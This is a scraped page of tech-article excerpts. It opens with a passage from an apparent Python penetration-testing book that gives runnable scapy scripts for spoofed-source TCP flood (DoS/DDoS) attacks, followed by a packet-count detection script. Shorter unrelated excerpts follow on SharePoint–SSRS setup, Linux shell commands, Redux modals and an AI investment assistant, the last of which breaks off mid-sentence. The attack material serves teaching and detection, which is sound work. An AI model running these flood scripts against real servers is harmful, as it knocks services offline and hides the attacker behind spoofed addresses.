network type, company's policies, do's and don'ts, the IP address, and the IPS/IDS firewall Gray-box pentesting follows hybrid approach of black and white box testing The tester usually has limited information on the target network/system that is provided by the client to lower costs and decrease trial and error on the part of the pentester It performs the security assessment and testing internally Introducing Python scripting Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable type, data type tuple, list dictionary, functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstration have been done in Python 2.7.8 Version. If you use Linux OS such as Kali or BackTrack, then there will be no issue, because many programs, such as wireless sniffing, do not work on the Windows platform. Kali Linux also uses the 2.7 Version. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most of the hackers choose this profession because they don't want to do programming. They want to use tools. However, without programming, a hacker cannot enhance his2 skills. Every time, they have to search the tools over the Internet. Believe me, after seeing its simplicity, you will love this language. Understanding the tests and tools you'll need To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines in your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It will be a good idea to use CentOS or Red Hat Version 5 or 6 for the web server because this contains the RPM of Apache and PHP. For the Python script, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms. Learning the common testing platforms with Python You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as at least in one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux. In this book, Windows, CentOS, and Kali Linux will be used. A hacker always loves to work on a Linux system. As it is free and open source, Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. However, some tools work on both Linux and Windows, but on Windows, you have to install those tools. I expect you to have knowledge of Linux. Now, it's time to work with networking on Python. Implementing a network sniffer by using Python Before learning about the implementation of a network sniffer, let's learn about a particular struct method: struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format struct.unpack(fmt, string): This method unpacks the string according to the given format Let's discuss the code: import struct ms= struct.pack('hhl', 1, 2, 3) print (ms) k= struct.unpack('hhl',ms) print k The output for the preceding code is as follows: G:PythonNetworkingnetwork>python str1.py ☺ ☻ ♥ (1, 2, 3) First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. Values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections. Consider the situation of the client server model; let's illustrate it by means of an example. Run the struct1.py. file. The server-side code is as follows: import socket import struct host = "192.168.0.1" port = 12347 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) conn, addr = s.accept() print "connected by", addr msz= struct.pack('hhl', 1, 2, 3) conn.send(msz) conn.close() The entire code is the same as we have seen previously, with msz= struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message. Run the unstruc.py file. The client-side code is as follows: import socket import struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "192.168.0.1" port =12347 s.connect((host,port)) msg= s.recv(1024) print msg print struct.unpack('hhl',msg) s.close() The client-side code accepts the message and unpacks it in the given format. The output for the client-side code is as follows: C:network>python unstruc.py ☺ ☻ ♥ (1, 2, 3) The output for the server-side code is as follows: G:PythonNetworkingprogram>python struct1.py connected by ('192.168.0.11', 1417) Now, you must have a fair idea of how to pack and unpack the data. Format characters We have seen the format in the pack and unpack methods. In the following table, we have C Type and Python type columns. It denotes the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes. Format C Type Python type Standard size x pad byte no value   c char string of length 1 1 b signed char integer 1 B unsigned char integer 1 ? _Bool bool 1 h short integer 2 H unsigned short integer 2 i int integer 4 I unsigned int integer 4 l long integer 4 L unsigned long integer 4 q long long integer 8 Q unsigned long long integer 8 f float float 4 d double float 8 s char[] string   p char[] string   P void * integer   Let's check what will happen when one value is packed in different formats: >>> import struct >>> struct.pack('b',2) 'x02' >>> struct.pack('B',2) 'x02' >>> struct.pack('h',2) 'x02x00' We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes. Now, let's use the long int, which is 8 bytes: >>> struct.pack('q',2) 'x02x00x00x00x00x00x00x00' If we work on a network, ! should be used in the following format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little endian, you can refer to the Wikipedia page on Endianness: >>> struct.pack('!q',2) 'x00x00x00x00x00x00x00x02' >>>  You can see the difference when using ! in the format. Before proceeding to sniffing, you should be aware of the following definitions: PF_PACKET: It operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as a root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET. Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application. The following socket methods are used for byte-order conversion: socket.ntohl(x): This is the network to host long. It converts a 32-bit positive integer from the network to host the byte order. socket.ntohs(x): This is the network to host short. It converts a 16-bit positive integer from the network to host the byte order. socket.htonl(x): This is the host to network long. It converts a 32-bit positive integer from the host to the network byte order. socket.htons(x): This is the host to network short. It converts a 16-bit positive integer from the host to the network byte order. So, what is the significance of the preceding four methods? Consider a 16-bit number 0000000000000011. When you send this number from one computer to another computer, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again. Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP, that is, the physical layer (Ethernet), the Network layer (IP), and the TCP layer (port). Introducing DoS and DDoS In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making it unavailable for the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers. In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out DDoS, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports. Single IP single port In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and from a single source port number. This is a very low-level DoS attack, and this will test the web server's request-handling capacity. The following is the code of sisp.py: from scapy.all import * src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ") srcport = int(raw_input("Enter the Source Port ")) i=1 while True: IP1 = IP(src=src, dst=target) TCP1 = TCP(sport=srcport, dport=80) pkt = IP1 / TCP1 send(pkt,inter= .001) print "packet sent ", i i=i+1 I have used scapy to write this code, and I hope that you are familiar with this. The preceding code asks for three things, the source IP address, the destination IP address, and the source port address. Let's check the output on the attacker's machine:  Single IP with single port I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on a web server. Irrespective of whether it works or not, write your findings in the reports. Let's check the output on the server side:  Wireshark output on the server This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers. Single IP multiple port Now, in this attack, we use a single IP address but multiple ports. Here, I have written the code of the simp.py program: from scapy.all import *   src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ")   i=1 while True: for srcport in range(1,65535):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    i=i+1 I used the for loop for the ports Let's check the output of the attacker:  Packets from the attacker's machine The preceding screenshot shows that the packet was sent successfully. Now, check the output on the target machine:  Packets appearing in the target machine In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create multiple IP with a single port. Multiple IP multiple port In this section, we will discuss the multiple IP with multiple port addresses. In this attack, we use different IPs to send the packet to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs: import random from scapy.all import * target = raw_input("Enter the Target IP ")   i=1 while True: a = str(random.randint(1,254)) b = str(random.randint(1,254)) c = str(random.randint(1,254)) d = str(random.randint(1,254)) dot = "." src = a+dot+b+dot+c+dot+d print src st = random.randint(1,1000) en = random.randint(1000,65535) loop_break = 0 for srcport in range(st,en):    IP1 = IP(src=src, dst=target)    TCP1 = TCP(sport=srcport, dport=80)    pkt = IP1 / TCP1    send(pkt,inter= .0001)    print "packet sent ", i    loop_break = loop_break+1    i=i+1    if loop_break ==50 :      break In the preceding code, we used the a, b, c, and d variables to store four random strings, ranging from 1 to 254. The src variable stores random IP addresses. Here, we have used the loop_break variable to break the for loop after 50 packets. It means 50 packets originate from one IP while the rest of the code is the same as the previous one. Let's check the output of the mimp.py program:  Multiple IP with multiple ports In the preceding screenshot, you can see that after packet 50, the IP addresses get changed. Let's check the output on the target machine:  The target machine's output on Wireshark Use several machines and execute this code. In the preceding screenshot, you can see that the machine replies to the source IP. This type of attack is very difficult to detect because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host. Detection of DDoS When I was pursuing my Masters of Engineering degree, my friend and I were working on a DDoS attack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running only traffic containing port 80, it should be allowed. Now, let's go through a very simple code to detect a DDoS attack. The program's name is DDOS_detect1.py: import socket import struct from datetime import datetime s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) dict = {} file_txt = open("dos.txt",'a') file_txt.writelines("**********") t1= str(datetime.now()) file_txt.writelines(t1) file_txt.writelines("**********") file_txt.writelines("n") print "Detection Start ......." D_val =10 D_val1 = D_val+10 while True:   pkt = s.recvfrom(2048) ipheader = pkt[0][14:34] ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) IP = socket.inet_ntoa(ip_hdr[3]) print "Source IP", IP if dict.has_key(IP):    dict[IP]=dict[IP]+1    print dict[IP]    if(dict[IP]>D_val) and (dict[IP]<D_val1) :        line = "DDOS Detected "      file_txt.writelines(line)      file_txt.writelines(IP)      file_txt.writelines("n")   else: dict[IP]=1 In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider a case of a tutorial website. The hits from the college and school's IP would be more. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP. The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statements are the criteria to detect and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet's count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP]<D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file. It writes a single IP 9 times as we have mentioned D_val1 = D_val+10. You can change the D_val value to set the number of requests made by a particular IP. These depend on the old statistics of the website. I hope the preceding code will be useful for research purposes. Detecting a DDoS attack If you are a security researcher, the preceding program should be useful to you. You can modify the code such that only the packet that contains port 80 will be allowed. Summary In this article, we learned about penetration testing using Python. Also, we have learned about sniffing using Pyython script and client-side validation as well as how to bypass client-side validation. We also learned in which situations client-side validation is a good choice. We have gone through how to use Python to fill a form and send the parameter where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article. A single IP attack falls into the category of a DoS attack, and a Multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for a pentester but also for researchers. Taking advantage of Python DDoS-detection scripts, you can modify the code and create larger code, which can trigger actions to control or mitigate the DDoS attack on the server. Resources for Article: Further resources on this subject: Veil-Evasion [article] Using the client as a pivot point [article] Penetration Testing and Setup [article]
Read more
  • 0
  • 0
  • 41066

article-image-how-to-integrate-sharepoint-with-sql-server-reporting-services
Kunal Chaudhari
27 Jan 2018
5 min read
Save for later

How to integrate SharePoint with SQL Server Reporting Services

Kunal Chaudhari
27 Jan 2018
5 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Dinesh Priyankara and Robert C. Cain, titled SQL Server 2016 Reporting Services Cookbook.This book will help you get up and running with the latest enhancements and advanced query and reporting feature in SQL Server 2016.[/box] Today we will learn the steps to integrate SharePoint in the SQL Server Reporting services. We will create a Reporting Services SharePoint application, and set it up in a way that we are able to view reports when they are uploaded to SharePoint. Getting ready For this, all you'll need is a SharePoint instance you can work with. Do make sure you have an administrative access to the SharePoint site. If you have an Azure account, free or paid, you could set up a test instance of SharePoint and use it to follow the instructions in this article. Note the setup of such an Azure instance is outside the scope of this article. In this article, we assume you are using an on premise SharePoint installation. How to do it… Open the SharePoint 2016 Central Administration web page. Click on Manage service applications under the Application Management area: 3. The Service Applications tab now appears at the top of the page. Click on the New menu: 4. In the menu, find and click on the option for SQL Server Reporting Services Service Application: 5. You'll now need to fill out the information for the service application. Start at the top by giving it a good name, here we are using SSRS_SharePoint. 6. Presumably this is a new install, so you'll have to take the Create new application pool option. Give it an appropriate name; in this example, we used SSRS_SharePoint_Pool. 7. Select a security account to run under. Here we selected an account set up by our Active Directory administrator, which has permissions to SQL Server where SSRS is installed. 8. Enter the name of the server which has SQL Server 2016 Reporting Services installed. In this example, our machine is ACSrv. 9. By default, SharePoint will create a name for the database that includes a GUID (a long string of letters and numbers). You should absolutely rename this to eliminate the GUID, but ensure the database name will be unique. In this example, we used ReportingService_SharePoint. 10. Review the information so that it resembles the following figure, but don't hit OK quite yet as there are few more pieces of information to fill out. Scroll down in the dialog to continue: 11. After the database name, you'll need to indicate the authentication method. Assuming the credentials you entered for the security account came from your Active Directory administrator, you can take the default of Windows authentication. 12. Place a check mark beside the instance of SharePoint to associate this SSRS application with. Here there is only one, SharePoint – 80. 13. Click OK to continue. Assuming all goes well, you should see the following confirmation dialog. If so, click OK to proceed: 14. Now that SharePoint is configured, you'll now need to provide additional information to SQL Server. That is the purpose of this final screen, Provision Subscriptions and Alerts. Select the Download Script button, and save the generated SQL file: 15. Pass the SQL file to a database administrator to execute, or open it in SSMS and execute it yourself, assuming you have administrative rights on the SQL Server. SharePoint uses the concept of Service Applications to manage items which run under the hood of SharePoint. SQL Server Reporting Services is one such service application. By integrating it as a service application, end users can upload, modify, and view SSRS reports right within SharePoint. We began by generating a new Service Application, and picking Reporting Services from the list. We then needed to let SharePoint know where the SQL Server would be used to host both the database, as well as have a copy of Reporting Services for SharePoint installed. In addition, we also needed to provide security credentials for SharePoint to use to communicate with SQL Server. As the final step, we needed to configure SQL Server to now work with SharePoint. This was the purpose of the Provision Subscriptions and Alerts screen. Note there is an option to fill out a user name and credential; clicking OK would then have immediately executed scripts against the target SQL Server. In most mid-to large-size corporations, however, there will be controls in place to prevent this type of thing. Most companies will require a DBA to review scripts, or at the very least you'll want to keep a copy of the script in your source control system to be able to track what changes were made to a SQL Server. Hence, we suggest taking the action laid out in this article, namely downloading the script and executing it manually in the SQL Server Management Studio. To test your setup, we suggest creating a new report with embedded data sources and datasets. Upload that report to the server, and attempt to execute; it should display correctly if your install went well. If you enjoyed this excerpt, check out the book SQL Server 2016 Reporting Services Cookbook to know more about handling security and configuring email with SharePoint using Reporting Services.    
Read more
  • 0
  • 0
  • 40984
article-image-learning-essential-linux-commands-for-navigating-the-shell-effectively
Expert Network
16 Aug 2021
9 min read
Save for later

Learning Essential Linux Commands for Navigating the Shell Effectively 

Expert Network
16 Aug 2021
9 min read
Once we learn how to deploy an Ubuntu server, how to manage users, and how to manage software packages, we should take a moment to learn some important concepts and commands that will allow us to build more of the foundational knowledge that will serve us well while understanding the advanced concepts and treading the path of expertise. These foundational concepts include core Linux commands for navigating the shell.  This article is an excerpt from the book, Mastering Ubuntu Server, Third Edition by Jeremy “Jay” La Croix – A hands-on book that will teach you how to deploy, maintain and troubleshoot Ubuntu Server.    Learning essential Linux commands Building a solid competency on the command line is essential and effectively gives any system administrator or engineer superpowers. Our new abilities won’t allow us to leap tall buildings in a single bound, but will definitely enable us to execute terminal commands as if we’re ninjas. While we won’t master the art of using the command line in this section (that can only come with years and experience), we will definitely become more confident.  First, let’s talk about moving from one place to another within the Linux filesystem. Specifically, by “Linux filesystem”, I’m referring to the default structure of the various folders (also referred to as “directories”) contained within your Ubuntu installation. The Linux filesystem contains many important directories, each with their own designated purpose, which we’ll talk about in more detail in the book. Before we can explore that further, we’ll need to learn how to navigate from one directory to another. The first command we’ll cover in this section relative to navigating the filesystem will clarify the directory you’re currently working from. For that, we have the pwd command. The pwd command pwd stands for print working directory, and shows you where you currently are in the filesystem. If you run it, you may see output such as this:  Figure 4.1: Viewing the current working directory  In this example, when I ran pwd, the output informed me that my current working directory is /home/jay. This is known as your home directory and, by default, every user has one. This is where all the files for your user account will reside by default. Sure, you can create files anywhere you’d like, even outside your home directory if you have permission to do so or you use sudo. But just because you can doesn’t mean you should. As you’ll learn in this article, the Linux filesystem has a designated place for just about everything. But your home directory, located at /home/<username>, is yours. You own it, you control it—it’s your home on the server. In the early 2000s, Linux installations with a graphical user interface even depicted your home directory with an icon of a house.  Typically, files that you create in your home directory will have permission string similar to this:  -rw-rw-r-- 1 jay  jay      0 Jul  5 14:10 testfile.txt  You can see by default, files you create in your home directory are owned by your user, your group, and are readable by all three categories (user, group, and other).  The cd command To change our current directory and navigate to another, we can use the cd command along with a path we’d like to move to:  cd /etc  Now, I haven’t gone over the file and directory layout yet, so I just randomly picked the etc directory. The forward slash at the beginning designates the beginning of the filesystem. More on that later. Now, we’re in the /etc directory, and our command prompt has even changed as well:  Figure 4.2: Command prompt and pwd command after changing a directory  As you could probably guess, the cd command stands for change directory, and it’s how you move your working directory from one to another while navigating around. You can use the following command, for example, to return back to the home directory:  cd /home/<user>  In fact, there are several ways to return home, a few of which are demonstrated in the following screenshot:    Figure 4.3: Other ways of navigating to the home directory  The first command, cd -, doesn’t actually have anything to do with your home directory specifically. It’s a neat trick to return you to whatever directory you were in most previously. For me, the cd – command took me to the previous directory I was just in, which just so happened to be /home/jay. The second command, cd /home/jay, took me directly to my home directory since I called out the entire path. The last command, cd ~, also took me to my home directory. This is because ~ is shorthand for the full path to your home directory, so you don’t really ever have to type out the entire path to /home/<user>. You can just refer to that path simply as ~.  The ls command Another essential command is ls. The ls command lists the contents of the current working directory. We probably don’t have any contents in our home directory yet. But if we navigate to /etc by running cd /etc, as we did earlier, and then execute ls, we’ll see that the /etc</span> directory has a number of files in it. Go ahead and try it yourself and see:  cd /etc ls  We didn’t actually have to change our working directory to /etc just to list the contents. We could’ve just executed the following command:  ls /etc  Even better, we can run:  ls -l /etc  This gives us the contents in a long list, which I think is much easier to understand. It will show each directory or file entry on its own line, along with the permission string. But you probably already must be knowing ls as well as ls -l so I won’t go into too much more detail here. The -l portion of the ls command in that example is known as an argument. I’m not referring to an argument such as the ever-ensuing debate in the Linux community over which command-line text editor is the best between vim and emacs (it’s clearly vim). Instead, I’m referring to the concept of an argument in shell commands that allow you to override the defaults, or feed options to the command in some way, such as in this example, where we format the output of ls to be in a long list.  The rm command The rm command is another one that we touched on in, when we were discussing manually removing the home directory of a user that was removed from the system. So, at this point, you’re probably well aware of that command and what it does (it removes files and directories). It’s a potentially dangerous command, as you could use it to accidentally remove something that you shouldn’t have. We used the following command to remove the home directory of user dscully:  rm -r /home/dscully  As you can see, we’re using the -r argument to alter the behavior of the rm command, which, by default, doesn’t remove directories but only files. The -r argument instructs rm to remove everything recursively, even if it’s a directory. The -r argument will also remove subdirectories of the path as well, so you’ll definitely want to be careful with this command. As I’ve mentioned earlier in the book, if you use sudo with rm, you can hypothetically delete your entire Ubuntu installation!  Another option offered by rm is the -f argument which is short for force, and it tells rm not to prompt before removing things. This argument won’t be needed as often, and use cases for it are outside the scope of this article. But keep in mind that it exists, should you need it.  The touch command Another foundational command that’s good to know is touch, which actually serves two purposes. First, assuming you have permission to do so in your current working directory, the touch command will create an empty file if it doesn’t already exist. Second, the touch command will update the modification time of a file or directory if it does already exist:  Figure 4.4: Experimenting with the touch command  To illustrate this, in the related screenshot, I ran several commands. First, I ran the following command to create an empty file:  touch testfile.txt  That file didn’t exist before, so when I ran ls -l afterward, it showed the newly created file with a size of 0 bytes. Next, I ran the touch testfile.txt command again a minute later, and you can see in the screenshot that the modification time went from 15:12 to 15:13.  When it comes to viewing the contents of a file, we’ll get to that later on in the book, Mastering Ubuntu Server, Third Edition. And there are definitely more commands that we’ll need to learn to build the basis of our foundation. But for now, let’s take a break from the foundational concepts to understand the Linux filesystem layout better.  Summary There are more Linux commands than you will never be able to memorize. Most of us just memorize our favorite commands and variations of commands. You’ll develop your own menu of these commands as you learn and expand your knowledge. In this article, we covered many of the foundational commands that are, for the most part, essential. Commands such as grep, cat, cd, ls, and others were explored this time around.  About Jeremy “Jay” La Croix is a technologist and open-source enthusiast, specializing in Linux. Jay is currently the director of Cloud Services, Adaptavist. He has a net field experience of 20 years across different firms as a Solutions Architect and holds a master’s degree in Information Systems Technology Management from Capella University.     In addition, Jay also has an active Linux-focused YouTube channel with over 186K followers and 15.9M views, available at LearnLinux.tv, where he posts instructional tutorial videos and other Linux-related content.
Read more
  • 0
  • 0
  • 40962

article-image-creating-reusable-generic-modals-react-and-redux
Mark Erikson
11 Nov 2016
6 min read
Save for later

Creating Reusable Generic Modals in React and Redux

Mark Erikson
11 Nov 2016
6 min read
Modal dialogs are a common part of user interface design. As with most other parts of a UI, modals in a given application probably fall into two general categories: modals that are specific to a given feature or task, and modals that are intended to be generic and reusable. However, defining generic reusable modal components in a React/Redux application presents some interesting challenges. Here's one approach you can use to create generic reusable modals that can be used in a variety of contexts throughout a React/Redux application. First, we need a way to manage modals in general. In a typical object-oriented widget API, we might manually create an instance of a modal class, and pass in some kind of callback function to do something when it's closed. Here's what this might look like for a ColorPicker modal in an OOP API: const colorPickerInstance = new ColorPicker({ initialColor : "red", onColorPicked(color) { // do something useful with the "returned" color value } }); colorPickerInstance.show(); This presents some problems, though. Who really "owns" the ColorPicker? What happens if you want to show multiple modals stacked on each other? What happens with the ColorPicker instance while it's being displayed? In a React/Redux application, we really want our entire UI to be declarative, and to be an output of our current state. Rather than imperatively creating modal instances and calling show(), we'd really like any nested part of our UI to be able to "request" that some modal be shown, and have the state and UI updated appropriately to show the modal. Dan Abramov describes a wonderful approach on Stack Overflow to React/Redux modal management, in response to a question about displaying modal dialogs in Redux. It's worth reading his answer in full, but here's a summary: Dispatch an action that indicates you want to show a modal. This includes some string that can be used to identify which modal component should be shown, and includes any arbitrary values we want to be passed along to the rendered modal component: dispatch({ type : 'SHOW_MODAL", payload : { modalType : "SomeModalComponentIdentifier", modalProps : { // any arbitrary values here that we want to be passed to the modal } } }); Have a reducer that simply stores the modalType and modalProps values for 'SHOW_MODAL', and clears them for 'HIDE_MODAL'. Create a central component that connects to the store, retrieves the details ofwhat modal is open and what its props should be, looks up the correct component type, and renders it: import FirstModal from "./FirstModal"; import SecondModal from "./SecondModal"; // lookup table mapping string identifiers to component classes const MODAL_COMPONENTS = { FirstModal, SecondModal }; const ModalRoot = ({modalType, modalProps}) => { if(!modalType) return null; const SpecificModal = MODAL_COMPONENTS[modalType]; return <SpecificModal {...modalProps} /> } const mapState = state => state.modal; export default connect(mapState)(ModalRoot); From there, each modal component class can be connected to the store, retrieve any other needed data, and dispatch specific actions for both internal behavior as well as ultimately dispatching a 'HIDE_MODAL' action when it's ready to close itself. This way, the handling of modal display is centralized, and nested components don't have to "own" the details of showing a modal. Unfortunately, this pattern runs into a problem when we want to create and use a very generic component, such as a ColorPicker. We would probably want to use the ColorPicker in a variety of places and features within the UI, each needing to use the "result" color value in a different way, so having it dispatch a generic 'COLOR_SELECTED' action won't really suffice. We could include some kind of a callback function within the action, but that's an anti-pattern with Redux, because using non-serializable values in actions or state can break features like time-travel debugging. What we really need is a way to specify behavior specific to a feature, and use that from within the generic component. The answer that I came up with is to have the modal component accept a plain Redux action object as a prop. The component that requested the dialog be shown should specify that action as one of the props to be passed to the modal. When the modal is closed successfully, it should copy the action object, attach its "return value" to the action, and dispatch it. This way, different parts of the UI can use the "return value" of the generic modal in whatever specific functionality they need. Here's how the different pieces look: // In some arbitrary component: const onColorSelected = { type : 'FEATURE_SPECIFIC_ACTION', payload : { someFeatureSpecificData : 42, } }; this.props.dispatch({ type : 'SHOW_MODAL", payload : { modalType : "ColorPicker", modalProps : { initialColor : "red", // Include the pre-configured action object as a prop for the modal onColorSelected } } }); // In the ColorPicker component: handleOkClicked() { if(this.props.onColorSelected) { // If the code that requested this modal included an action object, // clone the action, attach our "return value", and dispatch it const clonedAction = _.clone(this.props.onColorSelected); clonedAction.payload.color = this.state.currentColor; this.props.dispatch(clonedAction); } this.props.hideModal(); } // In some reducer: function handleFeatureSpecificAction(state, action) { const {payload} = action; // Use the data provided by the original requesting code, as well as the // "return value" given to us by the generic modal component const {color, someFeatureSpecificData} = payload; return { ...state, [someFeatureSpecificData] : { ...state[someFeatureSpecificData], color } }; } This technique satisfies all the constraints for our problem. Any part of our application can request that a specific modal component be shown, without needing a nested component to "own" the modal. The display of the modal is driven by our Redux state. And most importantly, we can specify per-feature behavior and use "return values" from generic modals while keeping both our actions and our Redux state plain and serializable, ensuring that features like time-travel debugging still work correctly. About the author Mark Erikson is a software engineer living in southwest Ohio, USA, where he patiently awaits the annual heartbreak from the Reds and the Bengals. Mark is author of the Redux FAQ, maintains the React/Redux Links list and Redux Addons Catalog, and occasionally tweets at @acemarke. He can be usually found in the Reactiflux chat channels, answering questions about React and Redux. He is also slightly disturbed by the number of third-person references he has written in this bio!
Read more
  • 0
  • 0
  • 40946

article-image-ai-for-investment
Louis Owen
12 Apr 2024
12 min read
Save for later

AI for Investment

Louis Owen
12 Apr 2024
12 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights and books. Don't miss out – sign up today!IntroductionOne of the most important activities for an investor is to always keep up to date with the latest and relevant news. Usually, it’s done by reading at least a dozen news articles starting from macroeconomic issues, political issues, news related to the sector of the corresponding stock, analyst reports, and whatnot. This, of course, takes a lot of time and also sometimes can be overwhelming for new investors since the amount of information to be processed is too much.Many ML developers have tried to solve this issue by building a traditional ML workflow usually called the sentiment analyzer. This system will take text from the news as the input and return the sentiment score as the output. This is no doubt helpful for the investor, but it doesn’t solve the bigger problem which is the need to curate relevant articles and also knowing what’s the impact of each news toward their investment decision. In other words, it’s lacking of broader insight. What if there’s an AI assistant that can act as our personal investment news analyst? What if there’s an AI assistant that is able to analyze dozens of news articles and generate the insights summary along with the investment recommendation? And, what if I told you that this AI assistant is personalized toward your risk appetite and investment portfolio allocation? In this article, I’ll guide you on how to build an AI assistant that can do all the above-mentioned things with only a few lines of code - thanks to GPT4! We’ll discuss several ways to get the news data in bulk and in real-time. We’ll discuss what are the important search keywords we need to use to get relevant news data. We’ll also discuss how to construct the prompt to fulfill all of the above-mentioned criteria while also getting a great generated output. Finally, we’ll see how to put all of this together to build our AI assistant!Without wasting any more time, let’s take a deep breath, make yourselves comfortable, and be ready to learn how to build your personal AI investment news analyst!News Data SourcesGetting as much news data as possible is important since we don’t want to miss any important information out there. Once we get all the information, we just need to filter them out with the help of our AI assistant.SerpAPI is one of the best all-in-one scraping tools that we can utilize to get news data from Google, Yahoo, Bing, DuckDuckGo, and many other search engines. It also provides a free plan with a 100 searches/month limit. However, this limit is surely not enough for our use case. If you don’t mind spending some money and want to get multiple search results from different search engines, then this tool is suitable for you.Another solution that is more budget-friendly is by utilizing DuckDuckGo search engine API directly. DuckDuckGo is a search engine that offers data privacy as their main unique selling point. No search history will be stored. Moreover, they also open their search engine API for free. We will use DuckDuckGo in this article and learn how to utilize it via Python!The more effective way to widen our search results is actually not by using different search engines but by having a diverse yet mutually exclusive set of search keywords. The goal of our AI investment assistant is to summarize the important insights that are relevant to a particular stock that we’re interested in. Hence, we need to provide relevant news data to be able to achieve our goal.The following are some of the search keywords that we can use. Note that this list is not exhaustive, you can surely expand the search keywords based on your own needs. We’ll use AAPL as the ticker example. You can change it to any ticker you want.$AAPL stock $AAPL industry and competitors $AAPL business model and strategy $AAPL management and leadershipBesides ticker-specific search keywords, we can also search for more general information that is not ticker-specific. The following is an example list of such keywords.economic growth this yearmonetary and fiscal policies todaypolitic todayeconomic todayinflation rate todayinterest rate todayreal estate todayDuckDuckGo APIOnce we have the keywords list, we can easily get the news data using DuckDuckGo via Python. First, we need to install the duckduckgo package by running the following command. pip install duckduckgo-searchOnce it is installed we can create the general Python function that can take the search keyword as the input and return the search results.from duckduckgo_search import DDGS import json ddgs = DDGS() def web_search(query: str, num_results: int = 4,debug=True) -> str:    """Useful for general internet search queries."""    if debug:        print("Searching with query {0}...".format(query))    search_results = []    if not query:        return json.dumps(search_results)    results = ddgs.text(query)    if not results:        return json.dumps(search_results)    total_added = 0    for j in results:        search_results.append(j.get('body',''))        total_added += 1        if total_added >= num_results:            break    return search_resultsUsing this function is very simple. We just need to pass the search keyword along with the number of search results to this function and get the list of search results.apple_competitors_news = web_search(“$AAPL industry and competitors”, num_results = 10)Prompt EngineeringThe next important thing to do is to build our AI assistant. Here, we’ll utilize GPT4 to build our assistant. Since it’s an LLM, we just need to provide the prompt without the need to train it from scratch. However, creating the prompt itself is indeed not an easy task. I have published another article regarding prompt engineering if you’re interested to learn more about it.Remember that the goal of 